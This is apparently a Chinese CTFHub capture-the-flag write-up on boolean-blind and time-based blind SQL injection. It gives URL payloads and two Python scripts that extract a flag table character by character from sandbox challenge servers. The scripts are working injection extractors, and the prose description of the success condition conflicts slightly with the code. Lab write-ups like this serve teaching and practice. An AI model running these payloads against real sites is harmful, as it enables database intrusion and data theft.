CTFHub_技能树_SQL注入Ⅰ

SQL注入

布尔盲注

查看页面：

尝试输入测试信息：

提示为布尔注入，构造相应payload：

?id=1 and ascii(substr((select database()),1,1))>108

发现不管是否返回数据，都会显示query_success

根据老哥们的提示，得到一个骚操作：

?id=if(ascii(substr((select flag from flag),1,1))=99,1,(select table_name from information_schema.tables))

如果判断正确则返回query_error；如果判断错误则构造错误查询语句，返回query_error

python脚本如下：

import requests
table = ""
list_1 = [element for element in range(48,58)]
list_2 = [element for element in range(97,126)]
list_0 = list_1 + list_2

session = requests.session()
url = "http://challenge-4f5472e95739be70.sandbox.ctfhub.com:10080/"

for i in range(1,50):
    print(i)
    for j in list_0:
        payload = "if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))"%(i,j)
        str_get = session.get(url=url + '?id=' + payload).text
        if 'query_success' in str_get:
            table += chr(j)
            print(table)
            break

时间盲注

进行简单测试

发现没有任何回显，只能使用时间盲注。

脚本如下：

import requests
import time

session = requests.session()
url = "http://challenge-76a4dfec7c13446d.sandbox.ctfhub.com:10080"
table = ""

list_1 = [element for element in range(48,58)]
list_2 = [element for element in range(97,126)]
list_0 = list_1 + list_2

for i in range(1, 50):
    print(i)
    for j in list_0:
        # payload = "1 and if(substr(database(),%d,1) ='%s',sleep(1),1)"%(i, chr(j))
        payload = "1 and if(substr((select flag from flag),%d,1) = '%s',sleep(1),1)"%(i, chr(j))
        start_time = time.time()
        str_get = session.get(url=url + '?id=' + payload).text
        end_time = time.time()
        t = end_time - start_time
        if t > 1:
            table += chr(j)
            print(table)
            break

得到flag：